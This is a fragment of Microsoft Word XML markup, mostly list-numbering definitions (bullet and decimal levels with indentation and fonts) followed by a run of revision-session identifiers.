    <w:lvl w:ilvl="5" w:tplc="32069BF2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28BE60FE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="63C62592" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C50A8378" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="09512542"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ACE924C"/>
    <w:lvl w:ilvl="0" w:tplc="32CE8E92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="076054E6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5946284A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F1D6419C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="72524BA0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9CECB38E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CABAE868" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="89286BBA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="383E1E38" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="098A27D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F26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21DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="933C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E3D62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="426ED74A"/>
    <w:lvl w:ilvl="0" w:tplc="32B83CA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2514BF28" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FA4AA9DC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F2847B84" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E320CDDE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="46E88C80" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7E72639E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2A0EA18E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="68B8CE80" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17A12AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D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54DC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADA4F6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BB3513D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD9A59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F17730F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B976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27FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A2431F0"/>
    <w:lvl w:ilvl="0" w:tplc="A1BC3B5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6E68EC0A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D5CC8A56" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A53A0A9C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64045C44" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2F180168" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="60169F3A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FEEAEA2A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F36E6378" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="269A27D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D2D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523CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48263EE2"/>
    <w:lvl w:ilvl="0" w:tplc="FAD082CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2AEAC00C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="310886AA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AD62338E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5760670C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CF9E5F40" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A2844512" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4F62E6FA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8BBC1504" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="35720606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="648A89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6691C74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E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697C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA4CE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D09C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8084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B751F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA4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74738"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0558678A"/>
    <w:lvl w:ilvl="0" w:tplc="5CFA43EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C5108018">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FAC28D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C016AA4C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B9C8AA6C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5C280422" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C5EA4BD6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E828E3CE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="02689F18" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B853B78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D2D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A46D81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53A0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D17CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="959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169F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B976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558F7"/>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3098D"/>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EC6E2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05D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57EB5"/>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2A11EF"/>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9423CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="935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771C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3442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459345">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="943420220">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1307778227">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="179399477">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1771926285">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1507328887">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1175800143">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="997269300">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1869294881">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1533112726">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1410889122">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1785688284">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1095514520">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1992635374">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="944189428">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="519705859">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1000622284">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="490099929">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1298758074">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1162740168">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="569730438">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1879076883">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="609778989">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="840655966">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="488400956">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="989753139">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="570844534">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="355547681">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="530149795">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="882446674">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2021542544">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1581214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E"/>
    <w:rsid w:val="00003294"/>
    <w:rsid w:val="00011DBA"/>
    <w:rsid w:val="00017682"/>
    <w:rsid w:val="00022339"/>
    <w:rsid w:val="00033EC8"/>
    <w:rsid w:val="00037539"/>
    <w:rsid w:val="00046BED"/>
    <w:rsid w:val="00055045"/>
    <w:rsid w:val="00056C3E"/>
    <w:rsid w:val="00066F5F"/>
    <w:rsid w:val="0007438F"/>
    <w:rsid w:val="000778B5"/>
    <w:rsid w:val="00087743"/>
    <w:rsid w:val="000950D9"/>
    <w:rsid w:val="000A4289"/>
    <w:rsid w:val="000A44DA"/>
    <w:rsid w:val="000C7432"/>
    <w:rsid w:val="000D5C73"/>
    <w:rsid w:val="000E2AB3"/>
    <w:rsid w:val="000F56D3"/>
    <w:rsid w:val="00110356"/>
    <w:rsid w:val="00111129"/>
    <w:rsid w:val="00111E36"/>
    <w:rsid w:val="00115EE2"/>
    <w:rsid w:val="00116557"/>
    <w:rsid w:val="001215EC"/>
    <w:rsid w:val="00124941"/>
    <w:rsid w:val="001330E3"/>
    <w:rsid w:val="0013450B"/>
    <w:rsid w:val="0014334F"/>
    <w:rsid w:val="00150680"/>
    <w:rsid w:val="0015734B"/>
    <w:rsid w:val="00165BC7"/>
    <w:rsid w:val="00175E22"/>
    <w:rsid w:val="00183FB3"/>
    <w:rsid w:val="00186F08"/>
    <w:rsid w:val="001911E4"/>
    <w:rsid w:val="001D6E6B"/>
    <w:rsid w:val="001E55F8"/>
    <w:rsid w:val="00200143"/>
    <w:rsid w:val="0020271E"/>
    <w:rsid w:val="002076EB"/>
    <w:rsid w:val="00220214"/>
    <w:rsid w:val="00225AF6"/>
    <w:rsid w:val="002318B9"/>
    <w:rsid w:val="002333BA"/>
    <w:rsid w:val="00244E22"/>
    <w:rsid w:val="00250115"/>
    <w:rsid w:val="002518AE"/>
    <w:rsid w:val="00252A48"/>
    <w:rsid w:val="00256F1B"/>
    <w:rsid w:val="002706E0"/>
    <w:rsid w:val="00276E81"/>
    <w:rsid w:val="002943DD"/>
    <w:rsid w:val="002C5863"/>
    <w:rsid w:val="002C6421"/>
    <w:rsid w:val="002E07CE"/>
    <w:rsid w:val="002E0856"/>
    <w:rsid w:val="00317DD7"/>
    <w:rsid w:val="0032484C"/>
    <w:rsid w:val="00335D96"/>
    <w:rsid w:val="00336FE0"/>
    <w:rsid w:val="00343A40"/>
    <w:rsid w:val="0034742C"/>
    <w:rsid w:val="0036082A"/>
    <w:rsid w:val="003719FB"/>
    <w:rsid w:val="00387AFC"/>
    <w:rsid w:val="003928CE"/>
    <w:rsid w:val="003C17E2"/>
    <w:rsid w:val="003C219B"/>
    <w:rsid w:val="003D3BAD"/>
    <w:rsid w:val="003E04D1"/>
    <w:rsid w:val="003F639E"/>
    <w:rsid w:val="00400385"/>
    <w:rsid w:val="004010AB"/>
    <w:rsid w:val="0041691D"/>
    <w:rsid w:val="00433718"/>
    <w:rsid w:val="00437E81"/>
    <w:rsid w:val="0044173D"/>
    <w:rsid w:val="00450D41"/>
    <w:rsid w:val="00455A9D"/>
    <w:rsid w:val="00485B13"/>
    <w:rsid w:val="004956AA"/>
    <w:rsid w:val="00496D0E"/>
    <w:rsid w:val="004A6329"/>
    <w:rsid w:val="004C6F13"/>
    <w:rsid w:val="004E111C"/>
    <w:rsid w:val="004F68CB"/>
    <w:rsid w:val="005046D0"/>
    <w:rsid w:val="005264D0"/>
    <w:rsid w:val="0052786E"/>
    <w:rsid w:val="00542A1D"/>
    <w:rsid w:val="00547413"/>
    <w:rsid w:val="00551964"/>
